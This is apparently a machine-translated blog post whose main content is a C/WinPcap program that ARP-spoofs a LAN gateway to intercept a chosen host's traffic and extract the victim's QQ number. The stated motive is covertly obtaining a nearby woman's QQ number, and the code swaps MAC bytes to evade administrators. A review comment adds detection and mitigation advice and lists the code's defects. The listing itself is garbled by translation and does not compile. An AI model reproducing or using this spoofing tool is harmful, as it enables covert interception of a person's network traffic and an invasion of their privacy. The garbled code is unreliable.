On a switched network, it is hard to find out other people's QQ numbers. If a pretty girl (plmm) is online nearby but you do not have the courage to ask her for her QQ number, that is a pity.
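In code, we can take advantage of how the switch forwards frames to sniff out the QQ number, because the QQ number is the only part of the QQ data that is not encrypted. The listing below does this with forged ARP replies sent to the gateway, so it only works where nothing validates ARP: dynamic ARP inspection on the switch, or a static ARP entry for the host on the gateway, stops it.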
/*
 * Review summary. The listing below is kept exactly as extracted. It has been
 * through machine translation (for example `If`, `INT`, `Delete`, `dww.ip`,
 * and `=` / `&` where comparison and logical AND are evidently meant), so it
 * does not compile as shown.
 *
 * What the visible code does:
 *   - main: lists the capture devices, opens the selected one with
 *     pcap_open_live in promiscuous mode, calls getnetconfig with the
 *     adapter's address, starts mythread, then runs pcap_loop with
 *     packet_handler as the callback.
 *   - getnetconfig: walks the GetAdaptersInfo list and stores the local IP,
 *     MAC, netmask and gateway IP in globals.
 *   - mythread: sends ARP requests until packet_handler has recorded the
 *     gateway MAC and the MAC of the IP typed in by the user, then sends ARP
 *     replies in an endless loop at the rate typed in. Each reply carries that
 *     IP as sender address and the recorded MAC with bytes [2] and [3] swapped
 *     as sender MAC. The destination MAC passed is ugatemac; `dww.ip` is
 *     presumably dwgateip -- confirm against the original source.
 *   - packet_handler: records MACs from ARP replies; for UDP packets with
 *     source port 8000 whose qqheader flag field is 0x02, prints the four
 *     bytes at pqqhdr->data as a big-endian number; re-sends frames whose
 *     destination IP is the chosen IP but whose destination MAC differs from
 *     the recorded one, after incrementing the last source-MAC byte and
 *     writing the recorded MAC as destination.
 *
 * What this looks like on the wire (detection and mitigation):
 *   - Unsolicited ARP replies to the gateway, repeating at a fixed rate, that
 *     advertise for one IP a MAC different from the one that host uses. ARP
 *     monitoring or dynamic ARP inspection flags this, and a static ARP entry
 *     for the host on the gateway is not overwritten by it.
 *   - Re-sent frames whose source MAC has had its last byte incremented.
 *
 * NOTE(review): defects visible in this listing:
 *   - scanf with a bare %s into `char IP [20]` has no field width, so a long
 *     input overflows the buffer.
 *   - `1000/nspeed` uses a value read by scanf with no range check, although
 *     the prompt says 1-50; an input of 0 divides by zero.
 *   - packet_handler tests header->len rather than caplen, reads
 *     piphdr->protocol before any length check in the IP branch, and after
 *     checking only the Ethernet + IP + UDP header sizes goes on to read the
 *     qqheader flag and four data bytes. A short or truncated capture is read
 *     out of bounds.
 *   - packet_handler writes through pkt_data, which is declared const in the
 *     callback signature.
 *   - getnetconfig does not check the GlobalAlloc result and never frees it.
 *   - main dereferences d->addresses without a NULL check and ignores the
 *     return value of getnetconfig.
 *   - bgatemac and bdstmac are plain bools written in the capture callback and
 *     polled in mythread with no synchronization.
 */
# Include "stdafx. H "# include" pcap. H "# include <stdio. h> # include "iphlpapi. H "# include" protocol. H "# pragma comment (Lib," wpcap. lib ") # pragma comment (Lib," iphlpapi. lib ") # pragma comment (Lib," wsock32.lib ") # define comment 1 DWORD dwmyip, dwgateip, dwsubnet, dwdstip; uchar umymac [6], ugatemac [6], udstmac [6]; pcap_t * adhandle; int ncount = 0; // It is used to perform three operations to obtain the gateway Mac: bool bgatemac = true; bool bdstmac = true; Void sendarprequest (DWORD dwdesip, DWORD dwsrcip, uchar usrcmac []); int sendpacket (char * pbuffer, int nlen);/* each time a packet is captured, libpcap will automatically call this callback function */void packet_handler (u_char * Param, const struct pcap_pkthdr * Header, const u_char * pkt_data) {etheader * pethdr = (etheader *) pkt_data; if (ntohs (pethdr-> type) = eth_type_arp) {If (header-> Len <sizeof (arppacket) return; arpheader * parphdr = (arpheader *) (char *) Pkt_data + sizeof (etheader); If (ntohs (parphdr-> opcode) = arpop_reply) {If (parphdr-> daddr = dwmyip & parphdr-> saddr = dwgateip & bgatemac) {If (ncount = 0) {memcpy (ugatemac, parphdr-> SMAC, 6); ncount ++;} else if (ncount = 3) // obtain the gateway Mac {bgatemac = false; return;} else {If (! Memcmp (ugatemac, parphdr-> SMAC, 6) {ncount ++;} else {ncount = 0 ;}} sendarprequest (dww.ip, dwmyip, umymac );} if (parphdr-> daddr = dwmyip & parphdr-> saddr = dwdstip & bdstmac) {memcpy (udstmac, parphdr-> SMAC, 6 ); bdstmac = false ;}}if (ntohs (pethdr-> type) = eth_type_ip) {ipheader * piphdr = (ipheader *) (char *) pkt_data + sizeof (etheader); If (piphdr-> protocol = protocol_udp) {If (header-> Len <sizeof (etheader) + Sizeof (ipheader) + sizeof (udpheader) return; udpheader * pudphdr = (udpheader *) (char *) piphdr + sizeof (ipheader )); if (ntohs (pudphdr-> srcport) = 8000) {qqheader * pqqhdr = (qqheader *) (char *) pudphdr + sizeof (udpheader )); if (pqqhdr-> flag! 
= 0x02) return; // It is not a QQ data packet uchar uqq [4]; memcpy (uqq, pqqhdr-> data, 4); DWORD dwqq = 0; for (INT I = 0; I <4; I ++) {dwqq = dwqq * 256 + uqq [I];} printf ("find the QQ number of IP: % s: % u \ n ", inet_ntoa (* (in_addr *) & piphdr-> dstaddr), dwqq );}} if (piphdr-> dstaddr = dwdstip & memcmp (pethdr-> dhost, udstmac, 6) // the destination IP address is the IP address to be sniffed, however, the target Mac is not the target Mac {pethdr-> shost [5] ++; // The source MAC cannot be set as the gateway MAC; otherwise, switch spoofing occurs, thus, other hosts cannot access memcpy (pethdr-> dhost, udstmac, 6); sendpacket (char *) P Kt_data, header-> Len) ;}} int sendpacket (char * pbuffer, int nlen) {If (pcap_sendpacket (adhandle, (uchar *) pbuffer, nlen) return 0; return 1;} void sendarprequest (DWORD dwdesip, DWORD dwsrcip, uchar usrcmac []) {arppacket * parppacket = new arppacket; For (INT I = 0; I <6; I ++) parppacket-> Eth. dhost [I] = 0xff; memcpy (parppacket-> Eth. shost, usrcmac, 6); parppacket-> Eth. type = ntohs (eth_type_arp); parppacket-> arp. HRD = NT OHS (arphrd_ether); parppacket-> arp. eth_type = ntohs (eth_type_ip); parppacket-> arp. maclen = 6; parppacket-> arp. iplen = 4; parppacket-> arp. opcode = ntohs (arpop_request); memcpy (parppacket-> arp. SMAC, usrcmac, 6); parppacket-> arp. saddr = dwsrcip; memset (parppacket-> arp. DMAc, 0, 6); parppacket-> arp. daddr = dwdesip; sendpacket (char *) parppacket, sizeof (arppacket); Delete parppacket;} void sendarpreply (DWORD dwdesip, d Word dwsrcip, uchar udesmac [], uchar usrcmac []) {arppacket * parppacket = new arppacket; memcpy (parppacket-> Eth. dhost, udesmac, 6); memcpy (parppacket-> Eth. shost, usrcmac, 6); parppacket-> Eth. type = ntohs (eth_type_arp); parppacket-> arp. HRD = ntohs (arphrd_ether); parppacket-> arp. eth_type = ntohs (eth_type_ip); parppacket-> arp. maclen = 6; parppacket-> arp. iplen = 4; parppacket-> arp. opcode = ntohs (arpop_reply); memcpy (Parppacket-> arp. 
SMAC, usrcmac, 6); parppacket-> arp. saddr = dwsrcip; memcpy (parppacket-> arp. DMAc, udesmac, 6); parppacket-> arp. daddr = dwdesip; sendpacket (char *) parppacket, sizeof (arppacket); Delete parppacket;} int winapi mythread (lpvoid PARAM) {// sleep (100 ); sendarprequest (dww.ip, dwmyip, umymac); While (1) {If (bw.mac) {: Sleep (100); continue;} break;} printf ("the gateway Mac is: % 02x-% 02x-% 02x-% 02x-% 02x-% 02x \ n ", ugatemac [0], Ugatemac [1], ugatemac [2], ugatemac [3], ugatemac [4], ugatemac [5]); printf ("Enter the IP address to sniff :"); char IP [20]; scanf ("% s", ip); dwdstip = inet_addr (IP); sendarprequest (dwdstip, dwmyip, umymac); While (1) {If (bdstmac) {: Sleep (100); continue;} break;} printf ("the target Mac is: % 02x-% 02x-% 02x-% 02x-% 02x-% 02x \ n ", udstmac [0], udstmac [1], udstmac [2], udstmac [3], udstmac [4], udstmac [5]); printf ("input number of spoofing packets per second: 1-50 \ n"); int nspeed; scanf ("% d", & nspeed ); Uchar UMAC [6]; UMAC [0] = udstmac [0]; UMAC [1] = udstmac [1]; UMAC [2] = udstmac [3]; UMAC [3] = udstmac [2]; // swap the third and fourth bytes of the Mac, confuse the Administrator UMAC [4] = udstmac [4]; UMAC [5] = udstmac [5]; while (1) {sendarpreply (dww.ip, inet_addr (IP), ugatemac, UMAC); sleep (1000/nspeed );} return 0;} int getnetconfig (DWORD dwip) {pip_adapter_info padapterinfo = NULL; ulong ullen = 0; // apply for memory for the adapter structure: getadaptersinfo (padapterinfo, & ullen); padapterinfo = (Pip_adapter_info): globalalloc (gptr, ullen); // obtain the local adapter structure information if (: getadaptersinfo (padapterinfo, & ullen) = error_success) {While (padapterinfo! = NULL) {If (dwip = inet_addr (padapterinfo-> ipaddresslist. IPaddress. string) {dwmyip = dwip; memcpy (umymac, padapterinfo-> address, 6); dwsubnet = inet_addr (padapterinfo-> ipaddresslist. ipmask. string); dwateip = inet_addr (padapterinfo-> gatewaylist. IPaddress. 
string); // cether: setgatewayaddr (inet_addr (padapterinfo-> gatewaylist. IPaddress. string), ""); printf ("local IP Address: % s \ n local Mac: % 02x-% 02x-% 02x-% 02x-% 02x-% 02x \ n Gateway IP Address: % s \ n ", padapterinfo-> ipaddresslist. IPaddress. string, umymac [0], umymac [1], umymac [2], umymac [3], umymac [4], umymac [5], padapterinfo-> gatewaylist. IPaddress. string); return 1;} padapterinfo = padapterinfo-> next;} return 0;} return-1;} int main (INT argc, char * argv []) {pcap_if_t * alldevs; pcap_if_t * D; int I = 0; char errbuf [pcap_errbuf_size];/* retrieve the device list from the local machine */If (pcap_fi Ndalldevs (& alldevs, errbuf) =-1) {printf ("error in pcap_findalldevs_ex: % s \ n", errbuf); exit (1 );} /* print the list */For (D = alldevs; D! = NULL; D = D-> next) {/* print the device's name */printf ("% d. % s ", ++ I, d-> name);/* print the device's dashboard */If (D-> description) {printf (" (% s) \ n ", D-> description);} else {printf (" (no description available) \ n ") ;}} if (I = 0) {printf ("\ Nno interfaces found! Make sure Winpcap is installed. \ n "); Return-1;} printf (" Enter the interface number (1-% d): ", I); int nidx; scanf (" % d ", & nidx); If (nidx <1 | nidx> I) {printf ("\ ninterface number out of range. \ n ");/* release the device list */pcap_freealldevs (alldevs); Return-1;}/* jump to the selected adapter */For (D = alldevs, I = 0; I <nIdx-1; D = D-> next, I ++);/* Open the device */If (adhandle = pcap_open_live (D-> name, // device name 65536, // 65535 ensure that all content of each packet on different data link layers can be captured. pcap_openflag_promiscuous, // mixed mode 10, // read timeout errbuf // Error Buffer Pool )) = NULL) {fprintf (stderr, "\ nunable to open the adapter. % s is not supported by Winpcap \ n ", D-> name);/* release device list */pcap_freealldevs (alldevs); Return-1 ;} printf ("\ nlistening on % s... 
\ n ", D-> description); getnetconfig (sockaddr_in *) (D-> addresses-> ADDR)-> sin_addr.s_un.s_addr ); /* release the device list */pcap_freealldevs (alldevs);: createthread (null, 0, (lpthread_start_routine) mythread, null,);/* start to capture */pcap_loop (adhandle, 0, packet_handler, null); Return 0 ;}